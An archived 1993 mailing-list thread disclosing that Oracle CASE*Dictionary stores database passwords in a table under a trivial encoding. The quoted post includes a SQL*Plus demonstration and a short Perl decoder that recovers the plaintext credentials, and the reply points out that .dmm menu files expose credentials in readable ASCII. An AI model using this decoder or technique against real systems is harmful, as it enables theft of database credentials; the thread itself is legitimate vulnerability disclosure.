Re: Oracle CASE saves passwords to DB [security]
Date: 16 Sep 1993 05:20:16 -0500
Message-ID: <CDFzAC.Bqw_at_uk.ac.brookes>
Allu Helenius (ahe_at_th.tele.fi) wrote:
: Howdy,
: While I was installing Oracle CASE (Dictionary 5.0.11.13.3 and
: Designer 1.1.21.5.0), I noticed that some parts of the CASE products
: exchange Oracle passwords via database. Saving passwords is something
: you never do, not even in encoded form like this example!!
: I browsed CASE*Dictionary Reference Guide and Administration Guide
: to see if this bug was documented, but found nothing. Is it somewhere
: else, I don't know. But I doubt.
: Try this to check whether your version of CASE contains this feature:
: $ casedict -ins
: CASE*Dictionary (TM): Version 5.0.22.6.0 - Production on Wed Sep 15 15:19:42 1993
: Copyright (c) Oracle Corporation 1979, 1992. All rights reserved.
: Usage: casedict -ins name/passwd report
: With -ins option CASE*Dictionary saves name/passwd for report report
: to column MU_ID of table SDD_MENU. Here is a SQL*Plus script to
: demonstrate what happens: ('arkki' is a oracle user name)
: set heading off feedback off
: column mu_id format a40
: grant connect to arkki identified by CASE;
: !casedict -ins arkki/CASE myreport >/dev/null
: select 'CASE',mu_id from sdd_menu where mu_block='myreport';
: grant connect to arkki identified by dIcTioNarY;
: !casedict -ins arkki/dIcTioNarY myreport >/dev/null
: select 'dIcTioNarY',mu_id from sdd_menu where mu_block='myreport';
: grant connect to arkki identified by STINKS;
: !casedict -ins arkki/STINKS myreport >/dev/null
: select 'STINKS',mu_id from sdd_menu where mu_block='myreport';
: Here is the shortened output of the script:
: CASE [g`\g/=0O_at_
: dIcTioNarY [g`\g/^8_OcdCRpY
: STINKS [g`\g/MCEIEH
: I used about fifteen minutes to analyze this (and some other) output
: and to write this perl script, which decodes these passwords:
: #!/usr/bin/perl
: # CASE password decoder, Allu Helenius 1993
: # - see how easy it is
: _at_key=split(//,";662?A;0=<");
: push(_at_key,_at_key,_at_key,_at_key); # enough..
: while (<>) {
: chop;
: _at_c = split(//);
: _at_p=();
: for ($i=0; $i<_at_c; $i++) {
: push(_at_p,pack("C",ord(@c[$i])+ord("A")-ord(@key[$i])));
: }
: print _at_p,"\n";
: }
: Here are the passwords above opened:
: $ ./crackcasepass
: [g`\g/=0O_at_
: arkki/CASE
: [g`\g/^8_OcdCRpY
: arkki/dIcTioNarY
: [g`\g/MCEIEH
: arkki/STINKS
: I've published this information in order to give a security lesson
: to Oracle's programmers. This is not the way to make a secure systems!!
: Security through obscurity isn't security at all!!
: Oh, one more thing. Casedict's usage says there's an option:
: -z Don't store the password.
: What is it? Is there a default always to save the password? Oh no...
: Well, whatever it is, it does not affect the example above, because
: its CASE*Designer Entity Relationship Diagrammer's Reports which
: at least call 'casedict -ins'...
: Happy computing,
: Allu
: --
: Allu Helenius, Telecom Finland
: The platform Oracle works best is 35mm slide projector.
--
This you call a security hole ?
Try running 'strings' on a .dmm file. (If you change username /
password when running menu options - so users don't know where the tables
really are - unless you are extremely devious they will be easily seen in the
.dmm file. AND THE USER HAS TO HAVE READ ACCESS TO IT TO USE THE MENUS !)
No clever shell scripts, no decoding, its in ascii large as life and
twice as beautiful.
_______________________________________________________________________________
Damian Branigan "So anyway here the story stays
(Project Leader ISS) As far at least as I understand
d.branigan_at_brookes.ac.uk And Robert Browning you writer of plays
Here's a story made to your hand." RB
_______________________________________________________________________________
Received on Thu Sep 16 1993 - 12:20:16 CEST